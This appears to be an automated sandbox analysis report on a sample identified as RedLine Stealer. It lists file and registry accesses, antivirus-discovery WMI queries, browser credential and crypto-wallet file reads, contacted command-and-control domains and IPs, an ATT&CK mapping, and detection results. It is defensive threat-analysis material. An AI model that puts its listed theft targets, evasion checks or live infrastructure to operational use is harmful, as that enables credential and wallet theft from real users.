                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C22A8 GetLocalTime,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,
                    Source: C:\Users\user\AppData\Roaming\325.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to steal Crypto Currency WalletsShow sources
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_XP
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_VISTA
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_7
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_8
                    Source: kS2dqbsDwD.exeBinary or memory string: WIN_8.1
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine StealerShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Spearphishing Link1Windows Management Instrumentation221Path InterceptionExploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                    Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture31Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Process Injection12Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery136Distributed Component Object ModelInput Capture31Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery451SSHClipboard Data2Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion231Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion231Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 452457 Sample: kS2dqbsDwD Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected RedLine Stealer 2->39 41 5 other signatures 2->41 7 kS2dqbsDwD.exe 14 2->7         started        process3 dnsIp4 21 iplogger.org 88.99.66.31, 443, 49711 HETZNER-ASDE Germany 7->21 23 is.gd 104.25.234.53, 443, 49712 CLOUDFLARENETUS United States 7->23 25 4 other IPs or domains 7->25 19 C:\Users\user\AppData\Roaming\325.exe, PE32 7->19 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 May check the online IP address of the machine 7->45 47 Sample or dropped binary is a compiled AutoHotkey binary 7->47 12 325.exe 3 7->12         started        file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 12->49 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->51 53 Performs DNS queries to domains with low reputation 12->53 55 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->55 15 325.exe 15 30 12->15         started        process9 dnsIp10 27 yspasenana.xyz 212.224.105.105, 49739, 49741, 49742 DE-FIRSTCOLOwwwfirst-colonetDE Germany 15->27 29 api.ip.sb 15->29 31 Tries to harvest and steal browser information (history, passwords, etc) 15->31 33 Tries to steal Crypto Currency Wallets 15->33 signatures11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    kS2dqbsDwD.exe20%VirustotalBrowse
                    kS2dqbsDwD.exe13%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\325.exe33%ReversingLabsByteCode-MSIL.Infostealer.Reline

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.1.kS2dqbsDwD.exe.140000000.0.unpack100%AviraHEUR/AGEN.1142275Download File
                    14.2.325.exe.400000.0.unpack100%AviraHEUR/AGEN.1140572Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    yspasenana.xyz1%VirustotalBrowse
                    api.ip.sb2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://service.r0%URL Reputationsafe
                    http://ahkscript.org1%VirustotalBrowse
                    http://ahkscript.org0%Avira URL Cloudsafe
                    http://yspasenana.xyz/1%VirustotalBrowse
                    http://yspasenana.xyz/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    https://api.ip.sb/geoip0%URL Reputationsafe
                    http://yspasenana.xyz40%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://yspasenana.xyz:80/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://support.a0%URL Reputationsafe
                    http://yspasenana.xyz0%Avira URL Cloudsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://forms.rea0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    https://d301sr5gafysq2.cloudfront.net;0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    https://sectigo.com/CPS0C0%URL Reputationsafe
                    https://sectigo.com/CPS0C0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s3-w.us-east-1.amazonaws.com
                    		52.217.201.169
                    		truefalse
                      		high
                      yspasenana.xyz
                      		212.224.105.105
                      		truetrueunknown
                      bitbucket.org
                      		104.192.141.1
                      		truefalse
                        		high
                        iplogger.org
                        		88.99.66.31
                        		truefalse
                          		high
                          is.gd
                          		104.25.234.53
                          		truefalse
                            		high
                            bbuseruploads.s3.amazonaws.com
                            		unknown
                            		unknownfalse
                              		high
                              api.ip.sb
                              		unknown
